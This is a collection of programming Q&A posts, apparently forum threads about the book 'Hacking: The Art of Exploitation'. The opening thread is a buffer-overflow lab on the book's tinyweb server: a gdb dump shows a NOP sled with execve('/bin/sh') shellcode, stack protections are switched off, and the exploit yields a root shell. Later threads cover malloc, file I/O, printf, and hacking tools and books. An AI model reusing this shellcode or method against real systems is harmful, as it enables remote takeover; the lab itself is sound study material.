0xbfff1b70: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfff1b80: 0x90909090  0x90909090  0x90909090  0xdb31c031
0xbfff1b90: 0xb099c931  0x6a80cda4  0x6851580b  0x68732f2f
0xbfff1ba0: 0x69622f68  0x51e3896e  0x8953e289  0x9080cde1
0xbfff1bb0: 0x90909090  0x90909090  0x90909090  0x90909090
----Output Trimmed----
0xbfff1c40: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfff1c50: 0x90909090  0x00000000  0x90909090  0x00000211
0xbfff1c60: 0x90909090  0x90909090  0x90909090  0xbfff1b28 
                              Overwritten Return Address-^
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x08048fff in handle_connection (sockfd=Cannot access memory at address 0x90909098
) at ../code/tinyweb.c:110
110 }
(gdb) c
Continuing.

Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.

Although not shown, the return address now contains a valid memory location located higher up on the stack. Here is the output from the webprogram....

Request 127.0.0.1:44576 "����������������������
�����������������������������������������������
�����������������������������������������������
�����������������������������������������������
�����������������������������������������������
�����������������������������������������������
��������������������������������������1�1�1ə��̀j

        Xqh//shh/bin��Q��S��̀�����������������������
    �����������������������������������������������
�����������������������������������������������
�����������������������������������������������
�##"

 NOT HTTP!

Shutting down socket.

Segmentation fault

As previously noted, the exploit fails. After turning off the stack smashing protection and making the stack executable though....

    $ gcc -z execstack -fno-stack-protector -g -o tinyweb ../code/tinyweb.c && readelf -l  tinyweb | grep      
-i stack
 GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x

Breakpoint 1, handle_connection (sockfd=13, client_addr_ptr=0xbf88b554) at ../code/tinyweb.c:61
61      printf("Request %s:%d \"%s\"\n", inet_ntoa(client_addr_ptr->sin_addr),     
ntohs(client_addr_ptr->sin_port), request);
(gdb) c
Continuing.

Breakpoint 2, handle_connection (sockfd=13, client_addr_ptr=0xbf88b554) at ../code/tinyweb.c:109
109     shutdown(sockfd, SHUT_RDWR);
(gdb) c
Continuing.
process 13666 is executing new program: /bin/dash

And back to the webserver output.....

Request 127.0.0.1:52107 "������������������������
��������������������������������������������
��������������������������������������������
��������������������������������������������
���������������������������������������������
���������������������������������������������
���������������������������������������1�1�1ə��̀j

                                                                              Xqh//shh/bin��Q��S��̀���������
������������������������������������������������
������������������������������������������������
�����������������������������������������������
���������������������##"

NOT HTTP!

Shutting down socket.

# whoami

root

Success.

This is a contrived example setup specifically to play around and learn how buffer overflows work, but the overall lesson about dealing with current protection measures is useful to know. While looking for an answer, I found this post about it which does a good job revisiting Smashing the Stack for Fun and Profit and explains the changes that developers have made to make it more difficult to exploit programs.

http://paulmakowski.wordpress.com/2011/01/25/smashing-the-stack-in-2011/

Hope this helps anyone who runs into the same issues down the road.

Check out these two C codes:

char* char_pointer;
int* int_pointer;

char_pointer = (char*)malloc(5);
printf("location of char_pointer: %p\n", char_pointer);

int_pointer = (int*)malloc(10);
printf("location of int_pointer: %p\n", int_pointer);

free(char_pointer);

char_pointer = (char*)malloc(50);
printf("location of char_pointer: %p\n", char_pointer); 

and

char* char_pointer;
int* int_pointer;

char_pointer = (char*)malloc(200);
printf("location of char_pointer: %p\n", char_pointer);

int_pointer = (int*)malloc(10);
printf("location of int_pointer: %p\n", int_pointer);

free(char_pointer);

char_pointer = (char*)malloc(50);
printf("location of char_pointer: %p\n", char_pointer); 

The outputs are:

location of char_pointer: 0x23eb010
location of int_pointer: 0x23eb030
location of char_pointer: 0x23eb050

and

location of char_pointer: 0x1815010
location of int_pointer: 0x18150e0
location of char_pointer: 0x1815010

As you see, in first program, it decided to allocate char_pointer after int_pointer(after I freeing and reallocating) but in second program it decided to allocated char_pointer in place of freed memory 0x1815010.

The only difference between programs is the amount of memory allocated and freed.

So, my questions are:

What does the decision of allocation place depend on? (OS, compiler or hardware)

Why does "it" make a decision to allocate in place of freed memory if the amount of allocated memory is "big"?

P.S. I have read about this issue in this book

It depends on a lot of factors, and there's no simple description to describe the behavior. Every C runtime library implements malloc() differently -- you can take a look at your CRT's source code if you're curious how it works under the hood.

Here are some commonly used malloc() implementations:

The rough way most memory allocators work is that they keep track of available memory regions. When a request comes in to allocate memory, they'll see if the have a memory region available that's at least as big as the request, and if so, carve up that memory, update its internal data structures to reflect that that memory is now allocated, and return the corresponding pointer. If not enough free memory is available, the allocator will ask the OS for more virtual memory address space (typically through sbrk(2), mmap(2), or VirtualAlloc).

So if a block gets allocated and then freed, and then another request of the same size (or smaller) gets requested, often (but not always), the same or a similar pointer is returned as the first block.

If the requested allocation is very large, the allocator may decide to skip its internal block handling and instead satisfy the request directly from the OS -- when allocating hundreds of KB or more, it's usually more efficient to just directly mmap() or VirtualAlloc() that memory, rather than try to find a free block in the list of internal free memory areas. But not all allocators do that, and the exact breakover point is often variable.

do you know where I can find Windows Low Level Assembly examples programs?

I have some exemples using macros (NASM, MASM) but I want pure assembly, in order I can build a shellcode later.

Thanks a lot guys!

For learning to build shellcode I would suggest creating a very simple c program that does what you want the shellcode to do and than disassemble that using IDA or Immunity (or whatever debugger / dissasembler that you are familiar with). Than you can see what the instructions are that are being used.

I would also recommend the following books:

Hacking: The Art of Exploitation (2nd Edition)

The Shellcoder's Handbook

I'm very interested in learning about cryptography, steganography, and similar practices.

What books, resources, would you guys recommend in this area?

This book is very nice and gives you a general idea about cryptography and as far as I remember some it gives also some information about steganography (from the ancient times): The Code Book: The Science of Secrecy from Ancient Egypt to Quantum Cryptography although not an academic book.

For steganography you could check also the following two: Disappearing Cryptography, Third Edition: Information Hiding: Steganography & Watermarking or Digital Watermarking and Steganography: Fundamentals and Techniques. As you are a Java developer you may also want to take a look at the Digital Invisible Ink Toolkit.

If you want to go deep into Cryptography (for example RSA algorithm) you should read math books about number theory, abstract algebra (for an introduction to these you can check this: A Primer on Algebra and Number Theory for Computer Scientists (it's a pdf file)). Or if you want to go much deeper you should read about elliptic curve cryptography.

About hacking you may want to take a look at this one: Hacking: The Art of Exploitation.

This book The Art of Deception: Controlling the Human Element of Security is also nice to read in order to learn social engineering techniques.

I found this source in Jon Erickson's book, Hacking: The Art of Exploitation,

userid = getuid(); // get the real user ID
// Writing data
if(write(fd, &userid, 4) == -1)  // write user ID before note data
    fatal("in main() while writing userid to file");
write(fd, "\n", 1); // terminate line

I tried to compile this code, and found that on the file I write, userid (which is what I write in the code above) is not right; they just wrote strange character (I think is not important to write it here). So the problem is I am trying to pass an int to a function which required char *, because of that the result on file I want to write is false.

So this is a bug, right?

The write() function expects a void * for its buffer; it writes arbitrary binary data. If you need conversion to string, use printf().

You don't show the declaration of userid, but the write() line should be written as:

if (write(fd, &userid, sizeof(userid)) != sizeof(userid))

This will detect short writes (unlikely to be a problem for an integer type) and other problems, and works correctly regardless of the type of userid. The original version of the line is arguably buggy, therefore. Otherwise, the bug seems to be in your expectations rather than the code per se.

I guess there are similar questions and some data on the web...but I want to be sure that I grasp the concept correctly, since all online tutorials are way too long and focus on exploits, ect. So, the way I see it a simple buffer overflow will be something like:

//////////////////////////////////////////////////

  1. You send a string of arguments/input like that: nop instructions(x90) + shellcode + some text + address of some nop instruction.

  2. If the string is of the correct length it will override the return address ebp with the address of some of the nop instructions. Once it jumps there - it will then skip until reaching the shellcode....and the rest is history.

////////////////////////////////////////////////

I am more of a c++/php/c# type of guy and assembly and c are beyond my mental capabilities....lol...so seriously...or jokingly..is the description above something along the line? Plus, as far as I understand there are some protections against buffers ovs., though I don't undertand them yet. How will firewall catch this?

10x!

Smashing the stack for fun and profit is a must read for anybody who is serious about understanding how Buffer Overflows work. You will find no better answer than what that white paper provides.

Edit

If you've already read Smashing the Stack and want to go further then may I suggest reading Hacking: The Art of Exploitation 2nd Ed

Hacking: The Art of Exploitation

I have recently learned the basics of buffer overflows, and I have written a few very simple pieces of C/C++ code with unsafe buffers and have produced some interesting results.

Now my question is this: Can you name a program that's actually out there in the wild that has a known buffer overflow vulnerability? I am especially looking for something that runs over a network, if possible.

I have seen tutorials and read articles and even watched videos that have talked about/demonstrated the buffer overflow vulnerability in the Ability FTP Server ver. 2.34, but I can not for the life of me find a single copy of it online anywhere. I can find plenty of downloads of non-vulnerable versions, but non of the educationally useful ones. Any help on this front would also be appreciated.

Thanks a bunch.

There is a great book which teaches exploiting buffer overflows (amongst other vulnerabilities). Book comes with a Linux LiveCD which is nicely set up with compilers/debuggers and plenty of exploitable programs.

Highly recommended if you haven't already picked it up:

enter image description here

Hacking. The Art of Exploitation

I cannot understand why a call to read after an lseek returns 0 number of bytes read.

//A function to find the next note for a given userID;
//returns -1 if at the end of file is reached;
//otherwise, it returns the length of the found note.
int find_user_note(int fd, int user_uid) {
    int note_uid = -1;
    unsigned char byte;
    int length;

    while(note_uid != user_uid) { // Loop until a note for user_uid is found.
        if(read(fd, &note_uid, 4) != 4) // Read the uid data.
            return -1; // If 4 bytes aren't read, return end of file code.
        if(read(fd, &byte, 1) != 1) // Read the newline separator.
            return -1;

        byte = length = 0;
        while(byte != '\n') { // Figure out how many bytes to the end of line.
            if(read(fd, &byte, 1) != 1) // Read a single byte.
                return -1; // If byte isn't read, return end of file code.

            //printf("%x ", byte);
            length++;
        }
    }
    long cur_position = lseek(fd, length * -1, SEEK_CUR ); // Rewind file reading by length bytes.

    printf("cur_position: %i\n", cur_position);

    // this is debug
    byte = 0;
    int num_byte = read(fd, &byte, 1);

    printf("[DEBUG] found a %d byte note for user id %d\n", length, note_uid);
    return length;
}

The variable length value is 34 when it exist the outer while loop and the above code produces cur_position 5 (so there are definitely at least 34 bytes after the lseek function returns), but the variable num_byte returned from function read always returns 0 even though there are still more bytes to read.

Does anyone know the reason num_byte always return 0? If it is a mistake in my code, am not seeing what it is.

Just for information, the above code was run on the following machine

$ uname -srvpio
Linux 3.2.0-24-generic #39-Ubuntu SMP Mon May 21 16:52:17 UTC 2012 x86_64 x86_64 GNU/Linux

Update:

  • I upload the full code here
  • This is the content of file that I try to read
$ sudo hexdump -C /var/notes
00000000  e8 03 00 00 0a 74 68 69  73 20 69 73 20 61 20 74  |.....this is a t|
00000010  65 73 74 20 6f 66 20 6d  75 6c 74 69 75 73 65 72  |est of multiuser|
00000020  20 6e 6f 74 65 73 0a                              | notes.|
00000027

$

I finally found the issue!!! I have to put #include <unistd.h> in order to use the correct lseek(). However I'm not sure why without including unistd.h it was compile-able though resulting in unexpected behavior. I thought that without including the prototype of a function, it shouldn't even compile-able.

The code was written in Hacking: The Art of Exploitation 2nd Edition by Jon Erickson and I have verified that in the book, there is no #include <unistd.h>.

So my line of code goes as followed

printf("test @ 0x%1$08x = %2$d 0x%2$08x\n", &test_val, test_val);

but instead of printing the variables it's printing

test @ 0x$08x = $d 0x$08x

It's completely ignoring the percent character and not printing out any variable. I can't find anything on this or any reason why this might happen hopefully someone can help.

EDIT: I could not find a link but basically from my knowledge and from Hacking: The art of Exploitation the number after the percent character should be the parameter it uses so %n$d would use the nth parameter and print as a decimal. in this case %1$08x would print &test_val in hexadecimal and %2$d would print test_val as a decimal.

Ok, I just want to make one thing clear, I don't plan to use any hacking skills picked up for any malicious or illegal things. Anyway...

So I am quite good HTML and CSS, relatively good at Javascript and jQuery, have very basic knowledge of PHP, C and Java and passing knowledge (know of them) about SQL and Python.

I've been doing coding for a while now and have done a substantial about, and now want to move on to other areas, such as hacking.

I know of basic methods such as SQL injection and XSS, but am looking for someone to point me in the right direction (books, websites, other resources etc.) to start.

I understand that a simple google search throws up hundreds of options, however I am looking for slightly more structured, user-friendly and applicable resources, and was also looking for the input of people experienced in hacking, to share how they got started and where to go from there, and any tips/advice.

Also as a side note, I am more interested in using hacking (eventually at least) practically, (but not maliciously, obviously) rather than theoretically, and I am not particularly interested in using it to improve security either.

Programming Languages

Knowledge of HTML, CSS, and jQuery will be of almost no benefit to a hacker. Whereas knowledge of C/C++ and/or Python are probably essentials. Another thing you'll need to know is ASM, as many remote exploits will involve sending the binary form of ASM into your attack vector.

Networking

You need advanced knowledge of most aspects of networking, including the OSI Model, ARP, how TCP and UDP work, and etc. Not only that, you need to know how to manipulate/use sockets in your programming language of choice.

Tools

Here is a list of some tools that are essential to most hackers. This is by no means comprehensive, however these are the most basic and powerful.

  • Kali Linux - This is one of the most useful, it contains most of the main programs a hacker will use, preinstalled on a gnome3+debian system. Most of the programs after this do come preinstalled.
  • nmap - Port scanner in it's most basic use.
  • ettercap - Used for anything related to ARP Poisoning.
  • XSScrapy - Scans remote websites for XSS vulnerabilities (and basic SQL Injection).
  • metasploit - This composes a large database of exploits, most of which can be launched on a target by inputing a few simple commands.
  • nikto - This scans remote webs servers for vulnerabilities.

Resources

And here are some other useful links:

Vulnerability Databases

Informational

Books

Hope this helped, good luck!